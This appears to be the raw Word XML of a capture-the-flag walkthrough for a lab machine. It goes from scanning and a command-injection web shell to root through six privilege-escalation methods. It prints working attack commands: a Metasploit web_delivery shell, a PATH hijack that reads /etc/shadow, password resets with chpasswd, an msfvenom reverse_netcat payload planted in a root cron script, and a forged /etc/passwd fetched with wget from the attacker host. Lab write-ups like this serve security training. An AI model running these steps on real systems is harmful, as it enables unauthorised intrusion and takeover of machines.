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P Simplified" w:hAnsi="HP Simplified" w:cs="HP Simplified"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="HP Simplified" w:hAnsi="HP Simplified" w:cs="HP Simplified"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Vulnerable Machine : Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="HP Simplified" w:hAnsi="HP Simplified" w:cs="HP Simplified"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pP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Security Level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: Beginner-Intermediate</w:t>
      </w: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Scanning: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start off by scanning the network using Netdiscover tool and identify the host IP address.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scan the services and ports of target machine with nmap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shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Enumeration: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can see port 80 is open, so we tried to open the IP address in our browser and got nothing but the default Apache webpage.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used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dirb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with .php filter for directory enumeration.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SimSun" w:cs="HP Simplified"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/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After brute-forcing with dirb, we found a URL named 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 HYPERLINK "http://192.168.0.17/shell.php" </w:instrTex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default" w:ascii="HP Simplified" w:hAnsi="HP Simplified" w:eastAsia="Muli" w:cs="HP Simplified"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>http://192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="HP Simplified" w:hAnsi="HP Simplified" w:eastAsia="Muli" w:cs="HP Simplified"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="HP Simplified" w:hAnsi="HP Simplified" w:eastAsia="Muli" w:cs="HP Simplified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  <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="HP Simplified" w:hAnsi="HP Simplified" w:eastAsia="Muli" w:cs="HP Simplified"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="HP Simplified" w:hAnsi="HP Simplified" w:eastAsia="Muli" w:cs="HP Simplified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/shell.php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Now we opened the URL in our browser and found that it accepts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cmd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as get parameter.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So, we passed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id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command in the URL and found the results are reflected in the response.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shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Exploiting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Since the target machine is vulnerable to command injection, we created a web delivery shell using Metasploit.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use exploit/multi/script/web_delivery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  <w:lang w:val="en-IN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set srvhost 192.168.0.</w:t>
      </w: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  <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>xx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  <w:lang w:val="en-IN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set lhost 192.168.0.</w:t>
      </w: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  <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>xx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exploit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 target host was not able to run the script directly, so we used URL encoding.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got the bash shell of User6 after using python one-liner shell command.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To further enumerate the target host, we uploaded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LinEnum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tool on the target host.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upload /root/LinEnum.sh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shell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python -c 'import pty;pty.spawn("/bin/bash")'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chmod 777 LinEnum.sh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./LinEnum.sh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From the results of LinEnum scan, we found that the target host has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eight users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namely user1, user2 up to user8.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also found that in crontab, a file named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autoscript.sh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is being run every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5 minutes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with root privileges.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From the same LinEnum scan, we came to know that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/etc/passwd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is writable for users also. Also, we found that we can run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shell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and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script files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with root privileges because SUID bit is enabled on it.</w:t>
      </w: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shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Privilege Escalation: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u w:val="single"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Method 1: Get root shell by exploiting SUID rights of the shell file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Using the find command we can confirm that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shell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file located in the home directory of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user3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can be executed with root privileges.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tried to execute the same file and got the root shell.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find / -perm -u=s -type f 2&gt;/dev/null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cd /home/user3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./shell</w:t>
      </w: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u w:val="single"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Method 2: Get a root shell by cracking the root password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From the above screenshot, we know that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script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file located in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user5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home directory can be executed with root privileges. Using the Path variable exploitation methodology we can access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/etc/shadow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file.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cd /tmp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echo "cat /etc/shadow" &gt; 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chmod 777 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export PATH=/tmp:$PATH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cd /home/user5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./script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copied the hashed password of root user in the hash file and used John The Ripper tool to crack the password. We got the password of the root as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12345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and then using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command we were able to access as root.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john hash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 root</w:t>
      </w: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u w:val="single"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Method 3: Get root shell by exploiting SUDO rights of user1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already know by now that script file can be executed with root privileges.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Using the same script file we can change the password of all the users with the help of Path variable methodology.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Here we used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echo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and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chpasswd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command to replace the existing password with our new password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12345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 And then switched to the user1 account using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command. After checking the sudoer’s list for user1 we came to know that this user can run all commands as sudo.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So we ran the command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sudo su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and got the root access.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echo 'echo "user1:12345" | chpasswd' &gt; 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chmod 777 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export PATH=/tmp:$PATH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cd /home/user5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./script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 user1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sudo –l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sudo su</w:t>
      </w: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u w:val="single"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Method 4: Get root shell by exploiting crontab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 the previous screenshot, we saw there is a task scheduled after every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5 minutes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for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user4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in the crontab by the name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autoscript.sh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 We changed the password of user4 the same way as we did for user1 and then switched to user4 with the new password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12345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 There we can see a file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autoscript.sh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 the Desktop folder.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 user4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ls -la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we created a payload using msfvenom and then copied the code into autoscript.sh file using echo.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msfvenom –p cmd/unix/reverse_netcat lhost=192.168.0.</w:t>
      </w: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  <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w: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 xml:space="preserve"> lport=8888 R</w:t>
      </w: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echo "code" &gt; autoscript.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/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After copying the code into autoscript.sh file we executed the file and started the netcat listener on our kali machine and waited for the shell.</w:t>
      </w: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  <w:t>nc –lvp 8888 id</w:t>
      </w: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u w:val="single"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Method 5: Exploiting SUDO rights of vi editor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changed the password of all the users to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12345 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using the same methodology as above and switched between users to check for more exploits. We found that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user8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has a sudo permission for vi editors.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 user8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sudo -l</w:t>
      </w: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Open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vi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editor with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sudo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and insert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sh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command as shown in the screenshot below, exit the editor and hurray we got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root shell.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:!sh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ids</w:t>
      </w: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  <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pP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50" w:afterAutospacing="0" w:line="15" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr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Style w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="HP Simplified" w:hAnsi="HP Simplified" w:eastAsia="sans-serif" w:cs="HP Simplified"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="800000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Method 6: Exploiting writable permission of /etc/passwd file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Continuing with the enumeration of users, we found that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user7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is a member of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root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group with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gid 0.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And we already know from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LinEnum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scan that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/etc/passwd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file is writable for the user. So from this observation, we concluded that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user7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can edit the /etc/passwd file.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tail /etc/passwd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 user7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id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So we copied the contents of /etc/passwd file in our kali machine and created a new user named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raj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with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root privileges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for which we generated a password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pass123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using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openssl.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openssl passwd -1 -salt ignite pass123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On the target machine, we downloaded the edited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passwd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file in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/etc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folder using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wge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 command.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HP Simplified" w:hAnsi="HP Simplified" w:eastAsia="Muli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Then we tried to switch to our newly created user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raj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and YES yet again we proudly got the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default" w:ascii="HP Simplified" w:hAnsi="HP Simplified" w:eastAsia="Muli" w:cs="HP Simplified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root shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="HP Simplified" w:hAnsi="HP Simplified" w:eastAsia="Muli" w:cs="HP Simplified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of the machine.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cd /etc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wget –O passwd http://192.168.0.</w:t>
      </w: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  <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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:8000/passwd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su raj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8"/>
        <w:spacing w:before="50" w:beforeAutospacing="0" w:after="130" w:afterAutospacing="0" w:line="14" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0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</w:rPr>
      </w:pPr>
      <w:r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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F7F8F8"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="HP Simplified" w:hAnsi="HP Simplified" w:eastAsia="monospace" w:cs="HP Simplified"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C4F53"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="F7F8F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Muli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e Worlds">
    <w:panose1 w:val="02000500000000020000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000001" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="sans-serif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C37CA"/>
    <w:rsid w:val="079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2021-09-05T03:48:00Z</dcterms:created>
  <dc:creator>KIIT</dc:creator>
  <cp:lastModifiedBy>KIIT</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-05T04:04:42Z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5680F1D8B8E54D24A100B31D3F5C7C74</vt:lpwstr>
  </property>
</Properties>
</file>